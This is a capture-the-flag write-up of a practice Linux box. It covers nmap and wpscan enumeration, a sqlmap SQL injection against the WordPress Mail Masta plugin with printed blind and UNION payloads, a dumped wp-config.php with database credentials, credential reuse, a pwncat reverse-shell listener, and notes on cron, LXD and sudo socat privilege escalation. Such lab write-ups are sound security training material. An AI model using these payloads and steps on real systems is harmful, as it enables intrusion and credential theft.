Description: This is a fun box where you will get to exploit the system in several ways. Few intended and unintended paths to getting user and root access.
# Nmap 7.91 scan initiated Sun Dec 13 17:28:29 2020 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.92.144 Nmap scan report for 10.10.92.144 Host is up (0.036s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.19.77 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA) | 256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA) |_ 256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Dec 13 17:29:46 2020 -- 1 IP address (1 host up) scanned in 76.20 seconds
[+] WordPress theme in use: twentytwenty | Location: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/ | Last Updated: 2020-12-09T00:00:00.000Z | Readme: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/readme.txt | [!] The version is out of date, the latest version is 1.6 | Style URL: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5 | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.5 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'
[+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods)
$ sqlmap -u http://10.10.92.144/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0&pl=/var/www/html/wordpress/wp-load.php -p list_id --dbms mysql ... --- Parameter: list_id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: list_id=0 AND (SELECT 6753 FROM (SELECT(SLEEP(5)))neUT)&pl=/var/www/html/wordpress/wp-load.php
Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: list_id=0 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626a7071,0x49486d5263485a6d4c484d43416b4c6a487a4663516a6264766244476467636c6848476e64594d79,0x71707a7871),NULL,NULL,NULL,NULL,NULL-- -&pl=/var/www/html/wordpress/wp-load.php ---
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' );
/** MySQL database username */ define( 'DB_USER', 'elyana' );
/** MySQL database password */ define( 'DB_PASSWORD', 'H@ckme@123' );
/** MySQL hostname */ define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' );
/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'zkY%m%RFYb:u,/lq-iZ~8fjENdIaSb=^k<3Zr/0DiLZqPxz|Auqli6lZ-9DRagJP' ); define( 'SECURE_AUTH_KEY', 'iAYak<_&~v9o+{b@RPR62R9 Ty- 6U-yH5baUD{;ndSiC[]qosxS@scu&S)d$H[T' ); define( 'LOGGED_IN_KEY', 'aPd_*sBf=Zuc++a]5Vg9=P~u03Q,zvp[eUe/})D=:NyhUY{KXR]t7}42Upk[r7?s' ); define( 'NONCE_KEY', '@i;T({xV/fvE!s+^de7e4LX3}NT@ j;b4[z3_fFJbbW(no 3O7F@sx0!oy(O`h#M' ); define( 'AUTH_SALT', 'B AT@i>* N#W<n!*|kFdMnQN)>^=^(iHp8Uvg<~2H~zF]idyQ={@}1}*r{lZ0,WY' ); define( 'SECURE_AUTH_SALT', 'hx8I:+Tz8n335Whmz[>$UZ;8rQYK>Rz]VGyBdmo7=&GZ!LO,pAMs]f!zV}xn:4AP' ); define( 'LOGGED_IN_SALT', 'x7r>|c0ML^s;Sw2*U!x.{`5D:P1}W= /ci{Q<tEM=trSv1eed|_fsL`y^S,XI<RY' ); define( 'NONCE_SALT', 'vOb%Wty}$zx9`|>45Ip@syZ ]G:C3|SdD-P3<{YP:.jPDX)H}wGm1*J^MSbs$1`|' );
/**#@-*/
/** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_';
/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); }
/** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Maybe the MySQL creds are re-used for the WP account: elyana / H@ckme@123.
$ pwncat -l 8080 -vv INFO: Listening on :::8080 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:8080 (family 2/IPv4, TCP) INFO: Client connected from 10.10.92.144:51076 (family 2/IPv4, TCP) bash: cannot set terminal process group (996): Inappropriate ioctl for device bash: no job control in this shell bash-4.4$
PS: there was also a /var/backups/script.sh used by cron to EoP as root directly.
There were two other methods one with LXD and the intended solution where you had
to find the elyana creds in a file and then abuse socat with sudo
(see the official WU).